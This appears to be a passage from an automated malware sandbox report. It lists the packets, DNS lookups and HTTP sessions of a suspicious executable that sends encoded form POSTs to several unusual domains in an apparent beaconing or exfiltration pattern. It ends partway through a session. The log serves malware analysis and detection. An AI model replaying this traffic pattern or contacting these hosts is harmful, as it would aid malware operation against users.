              Sep 22, 2024 17:36:19.221369028 CEST4972480192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:20.240097046 CEST4972580192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:20.245111942 CEST8049725217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:20.245196104 CEST4972580192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:20.256956100 CEST4972580192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:20.261780977 CEST8049725217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:20.261945963 CEST8049725217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:20.860364914 CEST8049725217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:20.860500097 CEST8049725217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:20.860552073 CEST4972580192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:21.769372940 CEST4972580192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:22.787373066 CEST4972680192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:22.792463064 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:22.792537928 CEST4972680192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:22.800704956 CEST4972680192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:22.805516005 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:23.407097101 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:23.407460928 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:23.407473087 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:23.407665968 CEST4972680192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:23.410317898 CEST4972680192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:23.415085077 CEST8049726217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:28.644109011 CEST4972780192.168.2.763.250.47.40
              Sep 22, 2024 17:36:28.649291039 CEST804972763.250.47.40192.168.2.7
              Sep 22, 2024 17:36:28.649369001 CEST4972780192.168.2.763.250.47.40
              Sep 22, 2024 17:36:28.662138939 CEST4972780192.168.2.763.250.47.40
              Sep 22, 2024 17:36:28.667310953 CEST804972763.250.47.40192.168.2.7
              Sep 22, 2024 17:36:29.258941889 CEST804972763.250.47.40192.168.2.7
              Sep 22, 2024 17:36:29.259074926 CEST804972763.250.47.40192.168.2.7
              Sep 22, 2024 17:36:29.259481907 CEST4972780192.168.2.763.250.47.40
              Sep 22, 2024 17:36:30.174237967 CEST4972780192.168.2.763.250.47.40
              Sep 22, 2024 17:36:31.194581985 CEST4972880192.168.2.763.250.47.40
              Sep 22, 2024 17:36:31.203371048 CEST804972863.250.47.40192.168.2.7
              Sep 22, 2024 17:36:31.203708887 CEST4972880192.168.2.763.250.47.40
              Sep 22, 2024 17:36:31.215193033 CEST4972880192.168.2.763.250.47.40
              Sep 22, 2024 17:36:31.222975016 CEST804972863.250.47.40192.168.2.7
              Sep 22, 2024 17:36:31.828917980 CEST804972863.250.47.40192.168.2.7
              Sep 22, 2024 17:36:31.829039097 CEST804972863.250.47.40192.168.2.7
              Sep 22, 2024 17:36:31.833561897 CEST4972880192.168.2.763.250.47.40
              Sep 22, 2024 17:36:32.723525047 CEST4972880192.168.2.763.250.47.40
              Sep 22, 2024 17:36:33.740295887 CEST4972980192.168.2.763.250.47.40
              Sep 22, 2024 17:36:33.803771973 CEST804972963.250.47.40192.168.2.7
              Sep 22, 2024 17:36:33.803901911 CEST4972980192.168.2.763.250.47.40
              Sep 22, 2024 17:36:33.815227985 CEST4972980192.168.2.763.250.47.40
              Sep 22, 2024 17:36:33.820138931 CEST804972963.250.47.40192.168.2.7
              Sep 22, 2024 17:36:33.820154905 CEST804972963.250.47.40192.168.2.7
              Sep 22, 2024 17:36:34.392795086 CEST804972963.250.47.40192.168.2.7
              Sep 22, 2024 17:36:34.392985106 CEST804972963.250.47.40192.168.2.7
              Sep 22, 2024 17:36:34.393042088 CEST4972980192.168.2.763.250.47.40
              Sep 22, 2024 17:36:35.729990005 CEST4972980192.168.2.763.250.47.40
              Sep 22, 2024 17:36:36.740554094 CEST4973080192.168.2.763.250.47.40
              Sep 22, 2024 17:36:36.746342897 CEST804973063.250.47.40192.168.2.7
              Sep 22, 2024 17:36:36.746438026 CEST4973080192.168.2.763.250.47.40
              Sep 22, 2024 17:36:36.754654884 CEST4973080192.168.2.763.250.47.40
              Sep 22, 2024 17:36:36.759638071 CEST804973063.250.47.40192.168.2.7
              Sep 22, 2024 17:36:37.347039938 CEST804973063.250.47.40192.168.2.7
              Sep 22, 2024 17:36:37.347064972 CEST804973063.250.47.40192.168.2.7
              Sep 22, 2024 17:36:37.347253084 CEST4973080192.168.2.763.250.47.40
              Sep 22, 2024 17:36:37.350400925 CEST4973080192.168.2.763.250.47.40
              Sep 22, 2024 17:36:37.357048988 CEST804973063.250.47.40192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 22, 2024 17:35:06.965960026 CEST6538853192.168.2.71.1.1.1
              Sep 22, 2024 17:35:07.514064074 CEST53653881.1.1.1192.168.2.7
              Sep 22, 2024 17:35:12.521604061 CEST5354153192.168.2.71.1.1.1
              Sep 22, 2024 17:35:12.572572947 CEST53535411.1.1.1192.168.2.7
              Sep 22, 2024 17:35:17.583753109 CEST5470653192.168.2.71.1.1.1
              Sep 22, 2024 17:35:18.184444904 CEST53547061.1.1.1192.168.2.7
              Sep 22, 2024 17:35:33.802619934 CEST6203253192.168.2.71.1.1.1
              Sep 22, 2024 17:35:33.930957079 CEST53620321.1.1.1192.168.2.7
              Sep 22, 2024 17:35:47.200541019 CEST5182953192.168.2.71.1.1.1
              Sep 22, 2024 17:35:47.958729982 CEST53518291.1.1.1192.168.2.7
              Sep 22, 2024 17:36:01.131347895 CEST5595253192.168.2.71.1.1.1
              Sep 22, 2024 17:36:01.507661104 CEST53559521.1.1.1192.168.2.7
              Sep 22, 2024 17:36:15.069417953 CEST5786353192.168.2.71.1.1.1
              Sep 22, 2024 17:36:15.131498098 CEST53578631.1.1.1192.168.2.7
              Sep 22, 2024 17:36:28.428900003 CEST4926353192.168.2.71.1.1.1
              Sep 22, 2024 17:36:28.641156912 CEST53492631.1.1.1192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 22, 2024 17:35:06.965960026 CEST192.168.2.71.1.1.10x3b34Standard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:12.521604061 CEST192.168.2.71.1.1.10x8528Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:17.583753109 CEST192.168.2.71.1.1.10xf4d9Standard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:33.802619934 CEST192.168.2.71.1.1.10x9872Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:47.200541019 CEST192.168.2.71.1.1.10xc7ecStandard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:01.131347895 CEST192.168.2.71.1.1.10x2206Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:15.069417953 CEST192.168.2.71.1.1.10x39f0Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:28.428900003 CEST192.168.2.71.1.1.10xa834Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 22, 2024 17:35:07.514064074 CEST1.1.1.1192.168.2.70x3b34Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:12.572572947 CEST1.1.1.1192.168.2.70x8528Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:18.184444904 CEST1.1.1.1192.168.2.70xf4d9No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:47.958729982 CEST1.1.1.1192.168.2.70xc7ecNo error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:35:47.958729982 CEST1.1.1.1192.168.2.70xc7ecNo error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:01.507661104 CEST1.1.1.1192.168.2.70x2206No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:36:01.507661104 CEST1.1.1.1192.168.2.70x2206No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:15.131498098 CEST1.1.1.1192.168.2.70x39f0No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:36:15.131498098 CEST1.1.1.1192.168.2.70x39f0No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:28.641156912 CEST1.1.1.1192.168.2.70xa834No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • www.elsupertodo.net
              • www.omexai.info
              • www.tekilla.wtf
              • www.bola88site.one
              • www.languagemodel.pro
              • www.kexweb.top

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749709148.72.152.174805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:18.210988045 CEST566OUTGET /2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.elsupertodo.net
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:18.760966063 CEST549INHTTP/1.1 301 Moved Permanently
              Server: nginx
              Date: Sun, 22 Sep 2024 15:35:18 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: close
              Location: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI
              X-XSS-Protection: 1; mode=block
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.7497113.33.130.190805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:33.969995022 CEST822OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d
              Data Ascii: H0QP6=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.7497123.33.130.190805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:36.550641060 CEST842OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 32 64 62 59 4d 79 4f 6c 75 74 32 54 66 39 75 64 4e 72 30 68 43 43 68 7a 78 36 59 77 4e 33 59 2b 61 46 4a 4f 70 34 74 55 36 64 2b 6d 50 45 67 46 38 3d
              Data Ascii: H0QP6=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612dbYMyOlut2Tf9udNr0hCChzx6YwN3Y+aFJOp4tU6d+mPEgF8=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.7497133.33.130.190805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:39.100012064 CEST1855OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 56 74 79 6b 44 75 51 52 62 6b 30 50 30 71 59 35 77 7a 35 7a 4e 73 4c 2f 52 61 72 6d 31 42 42 61 77 5a 7a 59 6f 6d 75 50 50 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2f 2b 68 36 47 52 32 4b 6f 50 4a 38 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 32 57 39 [TRUNCATED]
              Data Ascii: H0QP6=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nVtykDuQRbk0P0qY5wz5zNsL/Rarm1BBawZzYomuPPpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0/+h6GR2KoPJ8g2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1Sa8suzuhmtQFtoskBV5loS0Ji17YoBL5thyQnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA5resZkuFx5URVXyget5Hnwov91YZxvrc39e2gJl1aY7fSbX/sdFHG9ggU9XnKQbvhfglG7OYJex8kKeDpT8BSdJB1qt3oqLO36AiONwQdw/U33qn/EY4i0kznlFh5s0S8N+Ja2oYfYcbDeqRPMWUoUHWD3VwDttSi404R0zOPPOfz2awUkVzRz2w3a9sz2QHhs5nk5HbjVgc+9yDPWT11a/U3nOGIsFGhYkpSGkWhHuaqzzuUOCYhhT4NqguLCwISNx9Hue6U3huuGKlOYdf4p3Gaq9lv/w+9E9rYxdtF362NvozgttdGPxmCrBsupOK9rlJJrpuWeXWei8pvn0t/Svdm7LcFvcSvnEbhq/9Y1KXRVtxANBMta6/6wtKKLzn9kjmXaSQOFxjQL518Ims8qB25R0gq9FvNjnr/6XD1yzDL9m+RhktO3LcMN4sRNdDARdsYUm5iMUPj7t8fJUqaqzK1EZ8cEyUcyjjCAm1NCfbmGoFPrBepJ9uO3+Nin+oWwcVS6REo4m0OlFz [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.7497143.33.130.190805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:41.671920061 CEST562OUTGET /7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:42.173580885 CEST412INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 22 Sep 2024 15:35:42 GMT
              Content-Type: text/html
              Content-Length: 272
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 51 50 36 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 41 78 72 63 42 54 7a 74 70 6a 71 42 72 5a 68 77 69 41 30 45 48 2f 6c 54 6f 71 7a 75 53 34 38 65 58 6d 5a 4a 48 42 78 30 6d 50 4e 4d 44 32 5a 62 31 4e 65 53 42 55 71 75 26 4f 58 56 78 39 3d 57 4e 6a 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT"}</script></head></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.749715172.191.244.62805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:47.991040945 CEST822OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 53 41 4e 59 46 36 45 70 4e 32 76 6c 6e 4d 55 6a 52 37 53 42 48 56 43 67 4d 67 6d 7a 30 34 31 55 75 62 55 6d 4f 58 4d 6c 75 2f 50 66 45 43 31 36 67 3d 3d
              Data Ascii: H0QP6=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaSANYF6EpN2vlnMUjR7SBHVCgMgmz041UubUmOXMlu/PfEC16g==
              Sep 22, 2024 17:35:48.515252113 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:48 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.749716172.191.244.62805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:35:50.544984102 CEST842OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
